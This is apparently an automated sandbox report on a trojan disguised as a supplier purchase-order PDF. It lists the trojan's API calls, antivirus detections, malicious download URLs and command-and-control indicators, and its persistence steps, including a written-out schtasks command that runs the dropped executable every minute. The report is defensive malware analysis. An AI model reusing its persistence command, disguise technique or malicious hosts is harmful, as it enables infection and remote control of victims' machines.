                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 5208Thread sleep count: 64 > 30Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 5208Thread sleep time: -3840000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 4972Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeThread sleep count: Count: 4979 delay: -10Jump to behavior
                              Source: Yara matchFile source: 00000007.00000002.3396869708.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.3397773164.0000000002C10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.3396869708.0000000000817000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 2188, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, type: DROPPED
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00EA2044
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00EA219F
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_00EA24A9
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E96B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_00E96B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E96E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_00E96E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_00E9F350
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_00E9FDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E6DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_00E6DD92
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9FD47 FindFirstFileW,FindClose,9_2_00E9FD47
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E6E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,9_2_00E6E47B
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: TXAASJ.exe, 0000000F.00000003.2421242122.0000000001203000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWO
Source: Synaptics.exe, 00000003.00000002.2645686279.000000000060A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe Process information queried: ProcessInformation
Source: C:\ProgramData\Synaptics\Synaptics.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00EA703C BlockInput,9_2_00EA703C
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E5374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,9_2_00E5374E
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E846D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,9_2_00E846D0
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00EB20F6 LoadLibraryA,GetProcAddress,9_2_00EB20F6
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E7A937 GetProcessHeap,9_2_00E7A937
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E78E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00E78E3C
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E78E19 SetUnhandledExceptionFilter,9_2_00E78E19
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E8BE95 LogonUserW,9_2_00E8BE95
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E5374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,9_2_00E5374E
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E94B52 SendInput,keybd_event,9_2_00E94B52
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E97DD5 mouse_event,9_2_00E97DD5
Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe Process created: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe "C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe"
Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E8B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,9_2_00E8B398
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E8BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,9_2_00E8BE31
Source: TXAASJ.exe Binary or memory string: Shell_TrayWnd
Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2153702362.0000000005F2A000.00000004.00000020.00020000.00000000.sdmp, New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000000.2139101361.0000000000566000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E77254 cpuid 9_2_00E77254
Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E740DA GetSystemTimeAsFileTime,__aulldiv,9_2_00E740DA
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00ECC146 GetUserNameW,9_2_00ECC146
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E82C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,9_2_00E82C3C
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00E6E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,9_2_00E6E47B
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                              Stealing of Sensitive Information

Source: Yara match File source: New PO - Supplier 16-12-2024-Pdf.exe, type: SAMPLE
Source: Yara match File source: 0.0.New PO - Supplier 16-12-2024-Pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: New PO - Supplier 16-12-2024-Pdf.exe PID: 1472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Synaptics.exe PID: 4508, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, type: DROPPED
Source: Yara match File source: C:\ProgramData\Synaptics\RCX6FCE.tmp, type: DROPPED
Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
Source: TXAASJ.exe, 00000014.00000002.2576164901.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
Source: TXAASJ.exe, 00000014.00000003.2556035449.0000000004637000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_81
Source: TXAASJ.exe Binary or memory string: WIN_XP
Source: TXAASJ.exe, 0000000E.00000002.2354999669.00000000047FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_81|
Source: TXAASJ.exe Binary or memory string: WIN_XPe
Source: TXAASJ.exe Binary or memory string: WIN_VISTA
Source: TXAASJ.exe Binary or memory string: WIN_7
Source: TXAASJ.exe Binary or memory string: WIN_8

                              Remote Access Functionality

Source: Yara match File source: New PO - Supplier 16-12-2024-Pdf.exe, type: SAMPLE
Source: Yara match File source: 0.0.New PO - Supplier 16-12-2024-Pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: New PO - Supplier 16-12-2024-Pdf.exe PID: 1472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Synaptics.exe PID: 4508, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, type: DROPPED
Source: Yara match File source: C:\ProgramData\Synaptics\RCX6FCE.tmp, type: DROPPED
Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00EA91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,9_2_00EA91DC
Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe Code function: 9_2_00EA96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,9_2_00EA96E2
[ATT&CK matrix; columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact]
[Behavior graph] Behavior Graph ID: 1582347 Sample: New PO - Supplier 16-12-202... Startdate: 30/12/2024 Architecture: WINDOWS Score: 100

Source | Detection | Scanner | Label | Link
New PO - Supplier 16-12-2024-Pdf.exe | 81% | Virustotal | | Browse
New PO - Supplier 16-12-2024-Pdf.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
New PO - Supplier 16-12-2024-Pdf.exe | 100% | Avira | TR/Dldr.Agent.SH |
New PO - Supplier 16-12-2024-Pdf.exe | 100% | Avira | HEUR/AGEN.1353217 |
New PO - Supplier 16-12-2024-Pdf.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
New PO - Supplier 16-12-2024-Pdf.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe | 100% | Avira | HEUR/AGEN.1353217 |
C:\ProgramData\Synaptics\RCX6FCE.tmp | 100% | Avira | TR/Dldr.Agent.SH |
C:\ProgramData\Synaptics\RCX6FCE.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | HEUR/AGEN.1353217 |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\Users\user\AppData\Local\Temp\BBLXFG.vbs | 100% | Avira | VBS/Runner.VPJI |
C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe | 100% | Avira | HEUR/AGEN.1353217 |
C:\Users\user\Documents\IPKGELNTQY\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH |
C:\Users\user\Documents\IPKGELNTQY\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe | 100% | Joe Sandbox ML | |
C:\ProgramData\Synaptics\RCX6FCE.tmp | 100% | Joe Sandbox ML | |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Documents\IPKGELNTQY\~$cache1 | 100% | Joe Sandbox ML | |
C:\ProgramData\Synaptics\RCX6FCE.tmp | 92% | ReversingLabs | Win32.Worm.Zorex |
C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe | 87% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe | 87% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\Documents\IPKGELNTQY\~$cache1 | 92% | ReversingLabs | Win32.Worm.Zorex |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://drive.userc | 0% | Avira URL Cloud | safe |
http://xred.site50.net/syn/SUpdate.ini0 | 100% | Avira URL Cloud | malware |
http://xred.site50.net/syn/SSLLibrary.dl | 100% | Avira URL Cloud | malware |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
freedns.afraid.org | 69.42.215.252 | true | false | | high
docs.google.com | 142.250.185.78 | true | false | | high
drive.usercontent.google.com | 142.250.185.65 | true | false | | high
xred.mooo.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
xred.mooo.com | false | | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.185.78 | docs.google.com | United States | 15169 | GOOGLEUS | false
172.111.138.100 | unknown | United States | 3223 | VOXILITYGB | true
69.42.215.252 | freedns.afraid.org | United States | 17048 | AWKNET-LLCUS | false
142.250.185.65 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1582347
                                                                                        Start date and time:2024-12-30 11:39:32 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 9m 13s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:23
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:New PO - Supplier 16-12-2024-Pdf.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.expl.evad.winEXE@21/50@9/4
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 99%
                                                                                        • Number of executed functions: 41
                                                                                        • Number of non-executed functions: 309
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 184.28.90.27, 20.189.173.10, 13.89.179.12, 13.107.246.45, 40.126.32.133, 4.245.163.56, 173.222.162.64
                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, onedscolprdwus09.westus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
05:40:35 | API Interceptor | 308x Sleep call for process: Synaptics.exe modified
05:41:15 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
11:40:27 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
11:40:29 | Task Scheduler | Run new task: BBLXFG.exe path: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
11:40:36 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BBLXFG "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
11:40:44 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BBLXFG.lnk
11:40:58 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BBLXFG "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):118
                                                                                                                      Entropy (8bit):3.5700810731231707
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                      MD5:573220372DA4ED487441611079B623CD
                                                                                                                      SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                      SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                      SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                      Malicious:false
                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):1.1346124675731957
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:jWLVpsfI4b0BU/3DzJDzqjLOA/FwiRfzuiFLZ24IO8EKDzy:6yfXoBU/3JqjPJzuiFLY4IO8zy
                                                                                                                      MD5:98479734B891A48E3DEADDB28B4E5653
                                                                                                                      SHA1:4BEFDA05457ADDB4EEB4BCBD75AF6E9523AB6620
                                                                                                                      SHA-256:E812FCDD8BE555DBC9150AEC130066F275009D804D80698B3E4B1242030AC573
                                                                                                                      SHA-512:E652E6795BBF8806FEFB098F36440CC2246F9674CB0A69C983D8169874F2E8AEDA3C8A9D19070A5FD1A61545619655D8E24C9D08672812893B2DB1837D76B3B1
                                                                                                                      Malicious:false
                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.8.8.6.7.5.5.0.1.7.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.8.8.7.3.5.5.0.1.7.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.0.3.8.c.6.8.-.f.d.d.a.-.4.8.8.d.-.8.8.d.d.-.0.3.1.c.c.2.e.9.1.a.c.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.0.6.4.9.7.d.3.-.4.c.f.0.-.4.b.1.e.-.a.9.3.e.-.c.9.7.f.2.e.6.5.6.5.7.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.9.c.-.0.0.0.1.-.0.0.1.5.-.4.e.2.4.-.7.0.3.d.a.7.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.6.c.2.b.a.a.7.2.e.a.5.d.0.8.b.6.5.8.3.8.9.3.b.0.1.0.0.1.e.5.4.0.2.1.3.f.4.a.a.f.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6336
                                                                                                                      Entropy (8bit):3.7207419136362283
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:R6l7wVeJ0xF6RGYik4clpri89bwWsfbQm:R6lXJ66RGYt4cTw1fJ
                                                                                                                      MD5:4464D6BA1B119B90C0DD20D3AFE07514
                                                                                                                      SHA1:2C417EB3E4CBBF7DD9D8498321C3C02BCBFCFCD8
                                                                                                                      SHA-256:EC25627B92CA7E956151E4C1A0C958D4C909C5267FCA609C3D5F5A949711D11B
                                                                                                                      SHA-512:935B1B28754DD359D44983247572CFC899DC3AC083A5F5D90CB079A0FAB7750C9A2552A95D02EA96CC694AF4EA6F60E8A1DB0A9E50D376E1CCCF5FB22396961B
                                                                                                                      Malicious:false
